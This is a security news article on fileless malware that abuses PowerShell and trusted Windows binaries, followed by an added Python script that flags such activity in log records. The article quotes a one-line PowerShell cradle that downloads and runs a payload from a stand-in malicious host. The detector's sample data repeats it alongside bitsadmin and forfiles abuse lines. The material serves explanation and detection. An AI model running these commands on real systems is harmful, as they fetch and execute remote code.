Cybersecurity experts have recently observed a concerning trend in attack methodologies, with threat actors increasingly leveraging fileless techniques that weaponize PowerShell and legitimate Microsoft applications to deploy malware while evading detection.
These sophisticated attacks operate primarily in memory, leaving minimal forensic evidence and bypassing traditional security solutions that rely on file-based detection methods.
Fileless attacks, despite being around for over two decades, continue to present significant challenges to security teams.
According to recent security reports, approximately one-third of all attacks now employ fileless techniques, making them a prevalent threat in today’s cyber landscape.
The appeal for attackers lies in their ability to operate under the radar by exploiting trusted system components rather than introducing easily detectable malicious executables.
These attacks typically begin with a seemingly innocuous document containing malicious macros or a deceptive shortcut file, but quickly transition to memory-resident operations.
Rather than writing files to disk, attackers inject malicious code directly into running processes or leverage built-in Windows tools to execute their payloads, making detection exceedingly difficult for conventional security solutions.
Cybersecurity analyst Amr Thabet noted that PowerShell has emerged as the primary vehicle for these attacks due to its powerful scripting capabilities and deep integration with Windows systems.
Threat actors frequently use a one-line command that downloads and executes malicious code directly in memory: iex((New-Object Net.WebClient).DownloadString('https://malware.com/payload.ps1')).
This technique bypasses file-based detection since the payload never touches the disk.
The Rise of LOLBAS Techniques
Particularly concerning is the growing abuse of Living Off The Land Binaries And Scripts (LOLBAS), which involves repurposing legitimate Microsoft applications for malicious purposes.
For instance, attackers have been observed using bitsadmin.exe, a trusted Windows component, to download malware payloads when systems are idle.
LOLBAS project (Source – Medium)
The attackers create BITS jobs that retrieve malicious files and execute them, using a sequence such as bitsadmin /create followed by additional commands to configure the job and run the payload.
Other legitimate applications being weaponized include ForFiles.exe, which APT41 has used to maintain persistence by executing command prompt commands.
The attackers leverage these trusted binaries to blend their activities with normal system operations, making it nearly impossible for traditional security tools to distinguish between legitimate use and malicious exploitation.
Memory injection techniques further complicate detection efforts, as attackers can disguise their malware within legitimate processes like chrome.exe or svchost.exe.
Process hollowing, a technique first popularized by Stuxnet, involves executing a legitimate application in suspended mode, replacing its code with malware in memory, and then resuming execution—effectively hiding malicious activity behind a trusted process name.
Security professionals recommend implementing comprehensive endpoint detection and response solutions with memory analysis capabilities, enabling PowerShell logging and monitoring, implementing constrained language mode, and actively monitoring Active Directory for suspicious activities to defend against these sophisticated threats.
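To make the PowerShell logging recommendation concrete, the following is an added example (not from the article or from Amr Thabet) that scans log records for the patterns the article describes: the iex/DownloadString download cradle, bitsadmin job creation, and forfiles launching cmd.exe. The records are constructed to resemble PowerShell Script Block Logging (Event ID 4104) and process-creation command lines; the example.invalid URL and the rule names are assumptions of this example.

```python
import re

# Constructed sample records modelled on PowerShell Script Block Logging
# (Event ID 4104) and process-creation command lines. None come from a real host.
# Each tuple: (event_id, source, logged text)
SAMPLE_EVENTS = [
    (1, "4104", "Get-ChildItem C:\\Users | Sort-Object Length -Descending"),
    (2, "4104", "iex((New-Object Net.WebClient).DownloadString('https://example.invalid/p.ps1'))"),
    (3, "4104", "IEX ([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String($b)))"),
    (4, "ProcessCreate", "bitsadmin.exe /create /download backup_job"),
    (5, "ProcessCreate", "forfiles.exe /p C:\\Windows\\System32 /m calc.exe /c \"cmd /c @path\""),
    (6, "ProcessCreate", "bitsadmin.exe /list /allusers"),
]

# Detection rules (names are this example's own). Patterns are case-insensitive
# because PowerShell and cmd.exe are; iex, IEX and Invoke-Expression are equivalent.
RULES = [
    # Download cradle: Invoke-Expression plus a WebClient download in the same
    # script block, in either order (iex(...DownloadString) or ...DownloadString | iex).
    ("ps_download_cradle",
     re.compile(r"(?=.*\b(?:iex|invoke-expression)\b)(?=.*\bdownload(?:string|file)\b)", re.I | re.S)),
    # In-memory execution of a base64-decoded payload.
    ("ps_iex_base64",
     re.compile(r"\b(?:iex|invoke-expression)\b.*frombase64string", re.I | re.S)),
    # bitsadmin used to create or drive a transfer job (plain /list queries are not flagged).
    ("bitsadmin_job_create",
     re.compile(r"\bbitsadmin(?:\.exe)?\b.*\s/(?:create|addfile|setnotifycmdline|resume)\b", re.I)),
    # forfiles abused as a proxy to launch cmd.exe.
    ("forfiles_cmd_exec",
     re.compile(r"\bforfiles(?:\.exe)?\b.*\s/c\s+\"?cmd\b", re.I)),
]


def scan(events):
    """Return {event_id: [matching rule names]} for events hitting at least one rule."""
    hits = {}
    for event_id, _source, text in events:
        matched = [name for name, pattern in RULES if pattern.search(text)]
        if matched:
            hits[event_id] = matched
    return hits


if __name__ == "__main__":
    for event_id, rules in scan(SAMPLE_EVENTS).items():
        print(f"event {event_id}: {', '.join(rules)}")
```

Script Block Logging captures the de-obfuscated script text, so the rules above see `iex` and `DownloadString` even when the command line itself was encoded or split across variables.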